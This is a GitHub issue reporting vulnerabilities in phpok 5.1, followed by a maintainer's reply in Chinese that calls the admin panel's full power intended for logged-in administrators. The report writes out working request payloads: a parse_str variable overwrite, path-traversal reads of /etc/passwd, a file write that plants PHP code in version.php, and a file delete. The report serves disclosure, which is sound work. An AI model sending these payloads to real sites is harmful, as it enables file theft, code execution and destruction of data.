phpok 5.1 have Some Vulnerability #4

Passer6y · 2019-03-06T06:25:51Z

Variable Overwrite Vulnerability

from the Entrance of framework，i discovered parse_str variable overwrite in framework/init.php

we could watch $query_string parameter in framework/libs/server.php ：

payload：http://phpok/?data[script]=passer6y

Vulnerability to read arbitrary files

back to the:
framework/admin/tpl_control.php

framework/admin/appsys_control.php

there is two file have this vulnerability:
payload1:

/admin.php?c=appsys&f=file_edit&id=fav&title=../../../../../../../etc/passwd

payload2:

/admin.php?c=tpl&f=edit&id=1&title=../../../../../../../etc/passwd

Arbitrary File Writing to getshell

edit_save_f() function In framework/admin/tpl_control.php 383 line

payload:/admin.php?c=tpl&f=edit_save&id=1&title=../../../../../../../Users/passer6y/Documents/www/phpok/version.php&content=<%3fphp+phpinfo()%3becho+"passer6y"%3b%3f

Arbitrary file delete Vulnerability

framework/admin/tpl_control.php 303行 delfile_f()函数：

payload: /admin.php?c=tpl&f=delfile&id=1&title=../../../../../../../Users/passer6y/Documents/www/phpok/version.php

The text was updated successfully, but these errors were encountered:

qinggan · 2019-04-28T19:28:53Z

感谢您如此仔细的测评！
这里我们先说明一下，后台针对已经登录的管理员（目前是系统管理员）是有最高权限的！
回头我们会针对普通管理员进行一定的限制，感谢您的支持

qinggan closed this as completed Apr 28, 2019

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

phpok 5.1 have Some Vulnerability #4

phpok 5.1 have Some Vulnerability #4

Passer6y commented Mar 6, 2019

qinggan commented Apr 28, 2019

phpok 5.1 have Some Vulnerability #4

phpok 5.1 have Some Vulnerability #4

Comments

Passer6y commented Mar 6, 2019

Variable Overwrite Vulnerability

Vulnerability to read arbitrary files

Arbitrary File Writing to getshell

Arbitrary file delete Vulnerability

qinggan commented Apr 28, 2019